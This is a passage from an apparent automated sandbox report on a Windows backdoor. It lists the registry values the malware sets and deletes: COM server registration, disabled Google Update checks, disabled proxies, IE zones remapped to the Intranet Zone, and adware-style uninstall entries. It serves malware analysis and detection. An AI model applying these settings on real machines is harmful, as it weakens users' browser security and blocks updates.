The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Backdoor deletes the following registry key(s):

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1176 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F679D2F0-CE91-93C8-BD2D-062DF04DA0C1}]
"SilentUninstall" = "%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.exe /s /n /i:ExecuteCommands;UninstallCommands"

[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap" = "-dev-multi-chrome"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap" = "2.0-dev-multi-chrome"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F679D2F0-CE91-93C8-BD2D-062DF04DA0C1}]
"DisplayIcon" = "%System%\msiexec.exe"
"CategoryName" = "Apps"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F679D2F0-CE91-93C8-BD2D-062DF04DA0C1}]
"ProductName" = "WWhiteCouPooni"

[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"

"UpdateDefault" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F679D2F0-CE91-93C8-BD2D-062DF04DA0C1}]
"NoRepair" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F679D2F0-CE91-93C8-BD2D-062DF04DA0C1}]
"InstallDate" = "20150509"
"NoModify" = "1"

"UninstallString" = "%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.exe /s /n /i:ExecuteCommands;UninstallCommands"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6" = "1"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD 3B 87 11 89 AB 78 A3 A9 D1 7F 07 27 F9 62 4E"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6AU" = "1"
"DoNotAllowIE6" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F679D2F0-CE91-93C8-BD2D-062DF04DA0C1}]
"DisplayName" = "WWhiteCouPooni"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"

[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Backdoor deletes the following registry key(s):

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1988 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}]
"SilentUninstall" = "%Program Files%\ActiveCoupon\ActiveCoupon.exe /s /n /i:ExecuteCommands;UninstallCommands"

[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"

"AutoUpdateCheckPeriodMinutes" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}]
"CategoryName" = "Apps"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}]
"InstallDate" = "20140222"
"Publisher" = "ActiveCoupon"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}]
"UninstallString" = "%Program Files%\ActiveCoupon\ActiveCoupon.exe /s /n /i:ExecuteCommands;UninstallCommands"
"DisplayName" = "ActiveCoupon"

"NoModify" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}]
"DisplayIcon" = "%System%\msiexec.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}]
"NoRepair" = "1"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA 63 AF 00 98 6D 98 39 66 CA 6D B1 37 AD 6F F1"

[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}]
"ProductName" = "ActiveCoupon"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"

[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Backdoor deletes the following registry key(s):

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:368 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\""alpha_installer""/n]
"last" = "13075686372168"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\HELPDIR]
"(Default)" = "c:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0]
"(Default)" = "JSIELib"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "c:\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}]
"(Default)" = "ITinyJSObject"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"GlobalMaxTcpWindowSize" = "16777215"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\FLAGS]
"(Default)" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\TypeLib]
"Version" = "1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "c:\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A2 BC A7 08 2A EB 60 D1 52 C0 23 81 D7 42 92 6B"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\TypeLib]
"(Default)" = "{157B1AA6-3E5C-404A-9118-C1D91F537040}"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\0\win32]
"(Default)" = "c:\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"

[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1888 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 F2 48 D7 33 BA 18 38 EE F1 A4 96 76 F7 F7 CC"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"

[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Backdoor deletes the following registry key(s):

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
